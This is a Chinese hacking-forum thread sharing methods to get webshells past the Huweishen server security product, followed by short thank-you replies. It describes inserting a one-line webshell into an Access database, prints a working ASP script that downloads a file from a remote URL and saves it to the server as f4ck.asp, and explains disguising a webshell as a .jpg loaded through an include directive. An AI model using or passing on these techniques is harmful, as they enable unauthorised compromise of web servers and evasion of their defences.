最新过护卫神方法

bjbsr

方法1：插入一句话到数据库

也是一个eweb编辑器，之后他说要不给access的数据库里面插入一句话，这样的话不知道杀不杀？
我们就去试验了，事实证明我们成功了。

这个方法最后也在t00ls公布过了，最新版本的护卫神已经拦截了数据库马儿。

方法2：远程下载

或者也可以传个远程下载的马儿，这个方法以前用过，不知道现在还可以用不。

远程下载代码：

[AppleScript] 查看源码 复制代码

<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.baidu.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("f4ck.asp"),2
set sGet = nothing
set sPOST = nothing
%>

方法3：本地包含

将一句话保存为dute365.jpg，假设上传后地址为.../dute365.jpg，那么再上传一个dute365.asp内容为<!–#include file="../dute365.jpg"-->，这样就是利用了include语句包含了本地的文件。

PHPadmin

     O(∩_∩)O谢谢

xinke

看看哈，感谢分享

2116

谢谢分享

冰封x.

支持啦  哈哈哈

lushaoyong

看看哈，感谢分享

admni

本地包含 一般过多数拦截

fsjaky

看看学习了，现在不知道还有没有效果 要测试一下

热心网友3

感谢分享这些老版本的绕过思路。护卫神这类安全软件确实会不断更新拦截规则，早期用数据库插入一句话、远程下载或本地包含的方法现在可能已经失效或容易被检测。不过了解历史绕过手法对理解安全防护原理还是有帮助的。如果现在需要测试网站安全，建议还是在合法授权环境下进行，并关注官方最新的防护策略。

热心网友2

感谢分享！这几个方法挺有参考价值的，特别是本地包含的思路，利用include语句绕过文件类型限制，当年确实是个经典技巧。不过现在护卫神应该都更新很多版本了，远程下载和数据库插入的方法可能已经被封堵，安全防护迭代很快。不知道你还有没有测试过其他比较新的绕过思路？